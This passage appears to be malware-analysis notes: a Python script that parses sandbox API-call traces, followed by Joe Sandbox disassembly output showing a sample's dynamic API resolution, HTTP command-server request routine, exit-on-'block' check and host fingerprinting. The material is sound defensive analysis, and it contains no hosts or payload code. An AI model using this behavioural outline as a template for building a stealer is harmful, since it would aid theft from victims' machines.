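• InternetCloseHandle.WININET(00000000), ref: 00144EAD
• InternetCloseHandle.WININET(00000000), ref: 00144EC5
• HttpOpenRequestA.WININET(00000000,00DDEB10,?,00DDE578,00000000,00000000,00400100,00000000), ref: 00144B15
• InternetCloseHandle.WININET(00000000), ref: 00144ECF
"""

# dwFlags bits accepted by HttpOpenRequestA (assumed from wininet.h; common flags only)
HTTP_OPEN_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}


@dataclass(frozen=True)
class ApiCall:
    api: str                # exported name, e.g. HttpOpenRequestA
    module: str             # module as the report prints it, e.g. WININET
    args: tuple             # argument values as printed: hex strings, '?' or a literal
    ref: int                # call-site address
    subcall: Optional[int]  # caller address for "Part of subcall function" entries, else None


def parse_api_lines(text: str) -> list:
    """Turn report lines into ApiCall records; lines that are not API entries are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def call_order(calls: list) -> list:
    """The function's own calls (subcall entries excluded) ordered by call-site address."""
    return [c.api for c in sorted(calls, key=lambda c: c.ref) if c.subcall is None]


def resolutions_by_module(calls: list) -> dict:
    """Number of GetProcAddress calls per module handle (the first argument)."""
    return dict(Counter(int(c.args[0], 16) for c in calls
                        if c.api == "GetProcAddress" and c.args and c.args[0] != "?"))


def arg_int(calls: list, api: str, index: int) -> Optional[int]:
    """Argument `index` of the first direct call to `api` as an int, or None if printed as '?'."""
    for c in sorted(calls, key=lambda c: c.ref):
        if c.api == api and c.subcall is None:
            return None if c.args[index] == "?" else int(c.args[index], 16)
    return None


def decode_flags(value: int, table: dict) -> list:
    """Names of the known bits set in `value`, low bit first; leftover bits appended as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(hex(value & ~known))
    return names


if __name__ == "__main__":
    c2 = parse_api_lines(C2_LINES)
    print("call order:", " -> ".join(call_order(c2)))
    flags = arg_int(c2, "HttpOpenRequestA", 6)
    print("HttpOpenRequestA dwFlags:", hex(flags), decode_flags(flags, HTTP_OPEN_FLAGS))
    per_module = resolutions_by_module(parse_api_lines(RESOLVER_LINES))
    print("GetProcAddress per module:", {hex(k): v for k, v in per_module.items()})
```

Two caveats when reading the decoded values. The argument values in these lines are stack snapshots taken at the call site, so a value only means something at a position you have matched against the Win32 prototype (dwFlags is the seventh HttpOpenRequestA parameter, dwService the sixth InternetConnectA parameter, where 3 is INTERNET_SERVICE_HTTP), and a '?' marks a value the plugin could not recover; the script returns None for those rather than guessing. The module handles (75900000, 76E80000 and so on) are load addresses in the analysis VM, not module names, so map them through the report's loaded-module list before naming the DLL.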
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001411B7), ref: 00157880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00157887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0015789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: be340cf9eae40504951bb02396f81f790f92633716146f5d06efeaf19a37866a
                              • Instruction ID: f7b3356eb9327794f16152f47d8d1cba303e35b31aee6bcdf4c5e62332828fb7
                              • Opcode Fuzzy Hash: be340cf9eae40504951bb02396f81f790f92633716146f5d06efeaf19a37866a
                              • Instruction Fuzzy Hash: 65F04FB1944608EBD714DF98DD4ABAEBBBCEB05711F10025AFA15A2680C77415048BA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: d8184a02b0c237b144b29bc7124afeabfb2e65a352105482def76ad9a5789803
                              • Instruction ID: d9ce69f1508911dfe59da079247cdb8f2d10115045d4b982186773681608de46
                              • Opcode Fuzzy Hash: d8184a02b0c237b144b29bc7124afeabfb2e65a352105482def76ad9a5789803
                              • Instruction Fuzzy Hash: 39D09E7490430CDBDB04DFE0D9496EDBB7CFB08716F101595ED0562350EB315595CBA6

                              Control-flow Graph
                              • Executed
                              • Not Executed
                              (Graph node dump omitted; function at 159c10-15a709 resolving imports through a chain of LoadLibraryA and GetProcAddress blocks, see APIs below.)
                              APIs
                              • GetProcAddress.KERNEL32(75900000,00DC5460), ref: 00159C2D
                              • GetProcAddress.KERNEL32(75900000,00DC51A0), ref: 00159C45
                              • GetProcAddress.KERNEL32(75900000,00DD96C8), ref: 00159C5E
                              • GetProcAddress.KERNEL32(75900000,00DD9620), ref: 00159C76
                              • GetProcAddress.KERNEL32(75900000,00DDCF50), ref: 00159C8E
                              • GetProcAddress.KERNEL32(75900000,00DDD1C0), ref: 00159CA7
                              • GetProcAddress.KERNEL32(75900000,00DCAF68), ref: 00159CBF
                              • GetProcAddress.KERNEL32(75900000,00DDD100), ref: 00159CD7
                              • GetProcAddress.KERNEL32(75900000,00DDD028), ref: 00159CF0
                              • GetProcAddress.KERNEL32(75900000,00DDD118), ref: 00159D08
                              • GetProcAddress.KERNEL32(75900000,00DDD0D0), ref: 00159D20
                              • GetProcAddress.KERNEL32(75900000,00DC5320), ref: 00159D39
                              • GetProcAddress.KERNEL32(75900000,00DC5200), ref: 00159D51
                              • GetProcAddress.KERNEL32(75900000,00DC5360), ref: 00159D69
                              • GetProcAddress.KERNEL32(75900000,00DC51E0), ref: 00159D82
                              • GetProcAddress.KERNEL32(75900000,00DDCF68), ref: 00159D9A
                              • GetProcAddress.KERNEL32(75900000,00DDCF98), ref: 00159DB2
                              • GetProcAddress.KERNEL32(75900000,00DCB058), ref: 00159DCB
                              • GetProcAddress.KERNEL32(75900000,00DC5240), ref: 00159DE3
                              • GetProcAddress.KERNEL32(75900000,00DDD178), ref: 00159DFB
                              • GetProcAddress.KERNEL32(75900000,00DDCF20), ref: 00159E14
                              • GetProcAddress.KERNEL32(75900000,00DDD058), ref: 00159E2C
                              • GetProcAddress.KERNEL32(75900000,00DDD1D8), ref: 00159E44
                              • GetProcAddress.KERNEL32(75900000,00DC5280), ref: 00159E5D
                              • GetProcAddress.KERNEL32(75900000,00DDCFB0), ref: 00159E75
                              • GetProcAddress.KERNEL32(75900000,00DDD0B8), ref: 00159E8D
                              • GetProcAddress.KERNEL32(75900000,00DDD1F0), ref: 00159EA6
                              • GetProcAddress.KERNEL32(75900000,00DDD0E8), ref: 00159EBE
                              • GetProcAddress.KERNEL32(75900000,00DDCFC8), ref: 00159ED6
                              • GetProcAddress.KERNEL32(75900000,00DDD040), ref: 00159EEF
                              • GetProcAddress.KERNEL32(75900000,00DDCF80), ref: 00159F07
                              • GetProcAddress.KERNEL32(75900000,00DDD208), ref: 00159F1F
                              • GetProcAddress.KERNEL32(75900000,00DDCF38), ref: 00159F38
                              • GetProcAddress.KERNEL32(75900000,00DDA4A8), ref: 00159F50
                              • GetProcAddress.KERNEL32(75900000,00DDCFE0), ref: 00159F68
                              • GetProcAddress.KERNEL32(75900000,00DDD088), ref: 00159F81
                              • GetProcAddress.KERNEL32(75900000,00DC52A0), ref: 00159F99
                              • GetProcAddress.KERNEL32(75900000,00DDCFF8), ref: 00159FB1
                              • GetProcAddress.KERNEL32(75900000,00DC52C0), ref: 00159FCA
                              • GetProcAddress.KERNEL32(75900000,00DDD190), ref: 00159FE2
                              • GetProcAddress.KERNEL32(75900000,00DDD010), ref: 00159FFA
                              • GetProcAddress.KERNEL32(75900000,00DC4E00), ref: 0015A013
                              • GetProcAddress.KERNEL32(75900000,00DC50E0), ref: 0015A02B
                              • LoadLibraryA.KERNEL32(00DDD148,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A03D
                              • LoadLibraryA.KERNEL32(00DDD070,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A04E
                              • LoadLibraryA.KERNEL32(00DDD130,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A060
                              • LoadLibraryA.KERNEL32(00DDD0A0,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A072
                              • LoadLibraryA.KERNEL32(00DDD1A8,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A083
                              • LoadLibraryA.KERNEL32(00DDD160,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A095
                              • LoadLibraryA.KERNEL32(00DDD4C0,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A0A7
                              • LoadLibraryA.KERNEL32(00DDD2B0,?,00155CA3,00160AEB,?,?,?,?,?,?,?,?,?,?,00160AEA,00160AE3), ref: 0015A0B8
                              • GetProcAddress.KERNEL32(75FD0000,00DC4FA0), ref: 0015A0DA
                              • GetProcAddress.KERNEL32(75FD0000,00DDD4D8), ref: 0015A0F2
                              • GetProcAddress.KERNEL32(75FD0000,00DD90F0), ref: 0015A10A
                              • GetProcAddress.KERNEL32(75FD0000,00DDD280), ref: 0015A123
                              • GetProcAddress.KERNEL32(75FD0000,00DC4E60), ref: 0015A13B
                              • GetProcAddress.KERNEL32(734B0000,00DCAB30), ref: 0015A160
                              • GetProcAddress.KERNEL32(734B0000,00DC4E20), ref: 0015A179
                              • GetProcAddress.KERNEL32(734B0000,00DCAA18), ref: 0015A191
                              • GetProcAddress.KERNEL32(734B0000,00DDD430), ref: 0015A1A9
                              • GetProcAddress.KERNEL32(734B0000,00DDD478), ref: 0015A1C2
                              • GetProcAddress.KERNEL32(734B0000,00DC4FC0), ref: 0015A1DA
                              • GetProcAddress.KERNEL32(734B0000,00DC5040), ref: 0015A1F2
                              • GetProcAddress.KERNEL32(734B0000,00DDD268), ref: 0015A20B
                              • GetProcAddress.KERNEL32(763B0000,00DC4FE0), ref: 0015A22C
                              • GetProcAddress.KERNEL32(763B0000,00DC4DA0), ref: 0015A244
                              • GetProcAddress.KERNEL32(763B0000,00DDD328), ref: 0015A25D
                              • GetProcAddress.KERNEL32(763B0000,00DDD3A0), ref: 0015A275
                              • GetProcAddress.KERNEL32(763B0000,00DC4F20), ref: 0015A28D
                              • GetProcAddress.KERNEL32(750F0000,00DCAB08), ref: 0015A2B3
                              • GetProcAddress.KERNEL32(750F0000,00DCAA40), ref: 0015A2CB
                              • GetProcAddress.KERNEL32(750F0000,00DDD388), ref: 0015A2E3
                              • GetProcAddress.KERNEL32(750F0000,00DC5160), ref: 0015A2FC
                              • GetProcAddress.KERNEL32(750F0000,00DC5020), ref: 0015A314
                              • GetProcAddress.KERNEL32(750F0000,00DCA9A0), ref: 0015A32C
                              • GetProcAddress.KERNEL32(75A50000,00DDD490), ref: 0015A352
                              • GetProcAddress.KERNEL32(75A50000,00DC4E80), ref: 0015A36A
                              • GetProcAddress.KERNEL32(75A50000,00DD90E0), ref: 0015A382
                              • GetProcAddress.KERNEL32(75A50000,00DDD340), ref: 0015A39B
                              • GetProcAddress.KERNEL32(75A50000,00DDD310), ref: 0015A3B3
                              • GetProcAddress.KERNEL32(75A50000,00DC5060), ref: 0015A3CB
                              • GetProcAddress.KERNEL32(75A50000,00DC5000), ref: 0015A3E4
                              • GetProcAddress.KERNEL32(75A50000,00DDD418), ref: 0015A3FC
                              • GetProcAddress.KERNEL32(75A50000,00DDD2E0), ref: 0015A414
                              • GetProcAddress.KERNEL32(75070000,00DC5180), ref: 0015A436
                              • GetProcAddress.KERNEL32(75070000,00DDD2F8), ref: 0015A44E
                              • GetProcAddress.KERNEL32(75070000,00DDD358), ref: 0015A466
                              • GetProcAddress.KERNEL32(75070000,00DDD3B8), ref: 0015A47F
                              • GetProcAddress.KERNEL32(75070000,00DDD4F0), ref: 0015A497
                              • GetProcAddress.KERNEL32(74E50000,00DC4DE0), ref: 0015A4B8
                              • GetProcAddress.KERNEL32(74E50000,00DC5120), ref: 0015A4D1
                              • GetProcAddress.KERNEL32(75320000,00DC4DC0), ref: 0015A4F2
                              • GetProcAddress.KERNEL32(75320000,00DDD3D0), ref: 0015A50A
                              • GetProcAddress.KERNEL32(6F060000,00DC5100), ref: 0015A530
                              • GetProcAddress.KERNEL32(6F060000,00DC4E40), ref: 0015A548
                              • GetProcAddress.KERNEL32(6F060000,00DC5080), ref: 0015A560
                              • GetProcAddress.KERNEL32(6F060000,00DDD298), ref: 0015A579
                              • GetProcAddress.KERNEL32(6F060000,00DC50A0), ref: 0015A591
                              • GetProcAddress.KERNEL32(6F060000,00DC50C0), ref: 0015A5A9
                              • GetProcAddress.KERNEL32(6F060000,00DC5140), ref: 0015A5C2
                              • GetProcAddress.KERNEL32(6F060000,00DC4EA0), ref: 0015A5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0015A5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0015A607
                              • GetProcAddress.KERNEL32(74E00000,00DDD2C8), ref: 0015A629
                              • GetProcAddress.KERNEL32(74E00000,00DD8FF0), ref: 0015A641
                              • GetProcAddress.KERNEL32(74E00000,00DDD370), ref: 0015A659
                              • GetProcAddress.KERNEL32(74E00000,00DDD4A8), ref: 0015A672
                              • GetProcAddress.KERNEL32(74DF0000,00DC4EC0), ref: 0015A693
                              • GetProcAddress.KERNEL32(6F9C0000,00DDD3E8), ref: 0015A6B4
                              • GetProcAddress.KERNEL32(6F9C0000,00DC4EE0), ref: 0015A6CD
                              • GetProcAddress.KERNEL32(6F9C0000,00DDD400), ref: 0015A6E5
                              • GetProcAddress.KERNEL32(6F9C0000,00DDD448), ref: 0015A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: d9da77870f466049eeb9ff5a2d61d9fdefeb6d02ff66c507d2c284f992cbdca2
                              • Instruction ID: c9baa8d314c8f650661bea869da5df87001cc78f4c94fd91a414c064df3420ea
                              • Opcode Fuzzy Hash: d9da77870f466049eeb9ff5a2d61d9fdefeb6d02ff66c507d2c284f992cbdca2
                              • Instruction Fuzzy Hash: BA622BB5500B00AFE746DFA8ED889563BFDF74C701F14859BB609C3264D739A452EB22

                              Control-flow Graph
                              • Executed
                              • Not Executed
                              (Graph node dump omitted; function at 146280-14652d performing an HTTP GET through InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile and InternetCloseHandle, see APIs below.)
                              APIs
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00144839
                                • Part of subcall function 001447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00144849
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • InternetOpenA.WININET(00160DFE,00000001,00000000,00000000,00000000), ref: 001462E1
                              • StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 00146303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00146335
                              • HttpOpenRequestA.WININET(00000000,GET,?,00DDE578,00000000,00000000,00400100,00000000), ref: 00146385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001463BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001463D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001463FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0014646D
                              • InternetCloseHandle.WININET(00000000), ref: 001464EF
                              • InternetCloseHandle.WININET(00000000), ref: 001464F9
                              • InternetCloseHandle.WININET(00000000), ref: 00146503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: fe9ed1c2f6b5ba1ad2dec3a1797073c9f539b9181a28d69d2259d7c69bb1d431
                              • Instruction ID: d5de3ba24c3c6f76057ef2885da0d6a9926d764e582977410e63f8ad89165688
                              • Opcode Fuzzy Hash: fe9ed1c2f6b5ba1ad2dec3a1797073c9f539b9181a28d69d2259d7c69bb1d431
                              • Instruction Fuzzy Hash: 87715B71A40218EBEB24DFA0CC49BEE77B8BF44705F508199F5096B190DBB46A89CF52

                              Control-flow Graph
                              • Executed
                              • Not Executed
                              (Graph node dump omitted; function at 155510-155ac6 looping over StrCmpCA result checks with a Sleep-based retry, see APIs below.)
                              APIs
                                • Part of subcall function 0015A820: lstrlen.KERNEL32(00144F05,?,?,00144F05,00160DDE), ref: 0015A82B
                                • Part of subcall function 0015A820: lstrcpy.KERNEL32(00160DDE,00000000), ref: 0015A885
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00155644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001556A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00155857
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00155228
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 001552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00155318
                                • Part of subcall function 001552C0: lstrlen.KERNEL32(00000000), ref: 0015532F
                                • Part of subcall function 001552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00155364
                                • Part of subcall function 001552C0: lstrlen.KERNEL32(00000000), ref: 00155383
                                • Part of subcall function 001552C0: lstrlen.KERNEL32(00000000), ref: 001553AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0015578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00155940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00155A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00155A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 50cf5adc04d0f77fe029cd0930ea2de546ab241a107125c03029f6cedc8d07af
                              • Instruction ID: 114fad11d2ed8dc8121e8184d5aea86eb13deaa88f4351ccdb463528e119a7f5
                              • Opcode Fuzzy Hash: 50cf5adc04d0f77fe029cd0930ea2de546ab241a107125c03029f6cedc8d07af
                              • Instruction Fuzzy Hash: F0E15671950604EADB04FBB0DC629ED733DAF64302F808259B9275B091EF346B4DCB92

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 1517a0-1517cd call 15aad0 StrCmpCA 1304 1517d7-1517f1 call 15aad0 1301->1304 1305 1517cf-1517d1 ExitProcess 1301->1305 1309 1517f4-1517f8 1304->1309 1310 1519c2-1519cd call 15a800 1309->1310 1311 1517fe-151811 1309->1311 1313 151817-15181a 1311->1313 1314 15199e-1519bd 1311->1314 1315 151835-151844 call 15a820 1313->1315 1316 1518f1-151902 StrCmpCA 1313->1316 1317 151951-151962 StrCmpCA 1313->1317 1318 151970-151981 StrCmpCA 1313->1318 1319 151913-151924 StrCmpCA 1313->1319 1320 151932-151943 StrCmpCA 1313->1320 1321 15185d-15186e StrCmpCA 1313->1321 1322 15187f-151890 StrCmpCA 1313->1322 1323 151821-151830 call 15a820 1313->1323 1324 1518ad-1518be StrCmpCA 1313->1324 1325 1518cf-1518e0 StrCmpCA 1313->1325 1326 15198f-151999 call 15a820 1313->1326 1327 151849-151858 call 15a820 1313->1327 1314->1309 1315->1314 1346 151904-151907 1316->1346 1347 15190e 1316->1347 1329 151964-151967 1317->1329 1330 15196e 1317->1330 1332 151983-151986 1318->1332 1333 15198d 1318->1333 1348 151926-151929 1319->1348 1349 151930 1319->1349 1350 151945-151948 1320->1350 1351 15194f 1320->1351 1338 151870-151873 1321->1338 1339 15187a 1321->1339 1340 151892-15189c 1322->1340 1341 15189e-1518a1 1322->1341 1323->1314 1342 1518c0-1518c3 1324->1342 1343 1518ca 1324->1343 1344 1518e2-1518e5 1325->1344 1345 1518ec 1325->1345 1326->1314 1327->1314 1329->1330 1330->1314 1332->1333 1333->1314 1338->1339 1339->1314 1355 1518a8 1340->1355 1341->1355 1342->1343 1343->1314 1344->1345 1345->1314 1346->1347 1347->1314 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 001517C5
                              • ExitProcess.KERNEL32 ref: 001517D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: cca6aa714e4b91157fb478bbb9dfc58f01f7e3983c1b877508088bc5a147b48e
                              • Instruction ID: 240bc0711ca73618e4b3e8ceb4c994fd799f638606bbe8e7352a00dd2e0d5a3e
                              • Opcode Fuzzy Hash: cca6aa714e4b91157fb478bbb9dfc58f01f7e3983c1b877508088bc5a147b48e
                              • Instruction Fuzzy Hash: 7A5181B4A04209FFDB06DFA0D954BBE77B9BF4430AF10814DE8266B240D770D959CB62

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 157500-15754a GetWindowsDirectoryA 1357 157553-1575c7 GetVolumeInformationA call 158d00 * 3 1356->1357 1358 15754c 1356->1358 1365 1575d8-1575df 1357->1365 1358->1357 1366 1575e1-1575fa call 158d00 1365->1366 1367 1575fc-157617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 157619-157626 call 15a740 1367->1369 1370 157628-157658 wsprintfA call 15a740 1367->1370 1377 15767e-15768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00157542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0015757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00157603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0015760A
                              • wsprintfA.USER32 ref: 00157640
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              • Associated: 00000000.00000002.2170569038.0000000000140000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 5c92bdb1dd9475943dab001c926f44b6e9cb130e07cf94e174d7cbfe79dc8f7d
                              • Instruction ID: 10e08316484374d86cbe93d4fb58035c8aed4ca8743b160c1388449df259ab9d
                              • Opcode Fuzzy Hash: 5c92bdb1dd9475943dab001c926f44b6e9cb130e07cf94e174d7cbfe79dc8f7d
                              • Instruction Fuzzy Hash: 264182B1D04348EBDB11DF94DC45BDEBBB8AF18701F100199F9196B280E775AA48CBA5

                              Control-flow Graph

                              APIs
